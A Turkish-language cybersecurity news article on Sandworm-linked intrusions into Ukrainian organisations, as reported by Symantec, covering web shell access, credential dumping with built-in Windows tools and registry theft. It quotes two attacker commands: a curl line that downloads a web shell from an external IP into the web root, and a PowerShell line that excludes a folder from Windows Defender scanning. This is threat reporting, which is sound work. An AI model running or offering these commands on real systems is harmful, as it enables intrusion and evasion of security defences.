Ukrayna hükümet kuruluşları, kalıcı ağ erişimini sürdürmek için karmaşık kaçırma teknikleri kullanan Rusya destekli tehdit aktörlerinin amansız siber tehditleriyle karşı karşıya kalmaya devam ediyor.
Son araştırmalar, saldırganların geleneksel güvenlik savunmalarını aşan gelişmiş taktikler uyguladığı, kritik altyapıları ve devlet kurumlarını hedef alan koordineli kampanyaları ortaya çıkardı.
Bu operasyonlar, anında yıkıcı yetenekler yerine kimlik bilgileri toplama ve hassas bilgilerin çıkarılmasına odaklanan hedefleme stratejilerinde önemli bir artışı temsil ediyor.
Saldırılar, ağlarda daha uzun süre kalma süresine doğru stratejik bir değişimi ortaya koyuyor; tehdit aktörlerinin kapsamlı keşif yapmasına ve aylarca gizli varlıklarını sürdürmesine olanak tanıyor.
Symantec analistleri ve araştırmacıları, büyük bir ticari hizmet kuruluşuna yönelik iki aylık bir operasyon ve yerel yönetim altyapısına karşı bir hafta süren bir kampanyayı kapsayan iki büyük izinsiz giriş olayı tespit etti.
Saldırganlar, kötü amaçlı yazılım dağıtımını en aza indirerek olağanüstü operasyonel güvenlik farkındalığı sergiliyor ve tespit edilmekten kaçınmak için öncelikle meşru Windows yönetim araçlarına ve çift kullanımlı yardımcı programlara güveniyor.
Kampanya, elektrik şebekeleri ve uydu iletişim ağları da dahil olmak üzere kritik altyapılara yönelik yıkıcı saldırılarıyla tanınan, GRU’ya bağlı bir Rus askeri istihbarat birimi olan Sandworm ile bağlantılı görünüyor.
İlk güvenlik ihlali, muhtemelen yamalanmamış güvenlik açıklarından yararlanılarak, halka açık sunucularda web kabuğu dağıtımı yoluyla meydana geldi. Saldırganlar, kalıcı arka kapı erişimi sağlamak ve uzaktan komut yürütme yeteneklerini etkinleştirmek için Localolive web kabuğunu kullandı.
Arazi Dışında Yaşayan Kimlik Toplama Mekanizmaları
Bu tehdit aktörlerinin kullandığı karmaşık kaçırma metodolojisi, modern güvenlik uygulamalarına ilişkin anlayışlarını ortaya koyuyor.
Saldırganlar, 27 Haziran 2025’te ilk erişime ulaştıktan sonra yerleşik Windows yardımcı programlarını kullanarak hemen keşif komutlarını çalıştırdı:
cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx
powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloadsSaldırganlar, İndirilenler klasöründeki Windows Defender taramasını kasıtlı olarak devre dışı bırakarak yönetici ayrıcalıkları gerektirdi.
Daha sonra, bellek dökümleri gerçekleştirmek ve işlem belleğinde saklanan kimlik bilgilerini çıkarmak için meşru rundll32.exe’yi comsvcs.dll ile birlikte kullanarak her otuz dakikada bir yürütülen zamanlanmış görevler oluşturdular.
Tehdit aktörleri, numaralandırma komutları aracılığıyla özellikle KeePass şifre kasası süreçlerini hedef alarak kimlik bilgisi havuzlarının hassas bir şekilde hedeflendiğini gösterdi.
Gelişmiş kaçakçılık, güvenlik izleme sistemlerinden kaçmak için tasarlanmış, nadiren kullanılan bir teknik olan bellek dökümü işlemleri için Windows Kaynak Sızıntısı Tanılama aracının (rdrleakdiag) kullanılmasıyla devam etti.
Yerel reg.exe komutları aracılığıyla kayıt defteri kovanının sızdırılması, ek kimlik bilgileri ve yapılandırma verilerinin çıkarılmasını mümkün kıldı.
Kampanya, tehdit aktörlerinin hızdan ziyade gizliliğe öncelik verdiğini, bir yandan atıf belirsizliğini korumak için meşru yönetim araçlarını kullanırken, bir yandan da uzun ağ erişim süreleri boyunca hassas kurumsal verileri sistematik olarak topladığını gösteriyor.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
